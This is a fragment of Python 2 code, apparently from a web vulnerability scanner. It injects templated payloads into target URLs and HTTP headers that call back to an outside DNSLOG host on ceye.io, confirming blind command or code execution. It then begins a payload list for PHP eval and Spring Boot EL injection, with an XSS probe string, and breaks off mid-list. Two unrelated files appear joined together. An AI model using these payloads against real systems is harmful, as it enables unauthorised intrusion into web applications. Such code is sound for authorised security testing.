def run(self):
DNSLOG_HOST = 'dseje4.ceye.io'
# run
for url in self.target_urls:
# 随机标记
sign = Random.id_generator(size=10)
# DNSLOG 地址
DNSLOG_HOST = '{}.{}'.format(sign, DNSLOG_HOST)
# 生成payload
payloads = [payload.format(DNSLOG_HOST)
for payload in payloads_tpl]
# Double Quotes
d_quotes = [
'"{}"'.format(payload) for payload in payloads
]
payloads.extend(d_quotes)
# 生成头部payload
headers = {}
for k, v in headers_tpl.iteritems():
if k == 'Referer':
headers[k] = v.format(url, DNSLOG_HOST)
continue
headers[k] = v.format(DNSLOG_HOST)
p = Pollution(payloads)
urls = []
for i in p.payload_generator(url):
urls.append(i)
print Url.urldecode(i)
logging.info('{0} => {1}'.format(url, sign))
print 'Payload Number:', len(urls)
# Start
rs = (grequests.get(u, headers=headers, allow_redirects=False)
for u in urls)
grequests.map(rs, gtimeout=BILID_REQUEST_TIMEOUT)
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
from utils import Random, Hash
phpinfo_sign = '<a href="http://www.php.net/">'
xss_payload = xss_sign = '\'";abcdefg123456'
el_sign = Random.id_generator(size=10)
el_payload = ','.join(str(ord(i)) for i in el_sign)
el_sign2 = '119841162-2'
el2_payload = el_sign2
# Command Execute Payloads
payloads = [
{
'name': 'PHP Code eval',
'payload': 'phpinfo();',
'sign': phpinfo_sign
}, {
'name': 'PHP Code eval',
'payload': '${print_r(md5(11123))};',
'sign': Hash.md5('11123')
}, {
'name': 'Sprint Boot EL',
'payload': '${{new java.lang.String(new byte[]{{{0}}})}}'.format(
el_payload),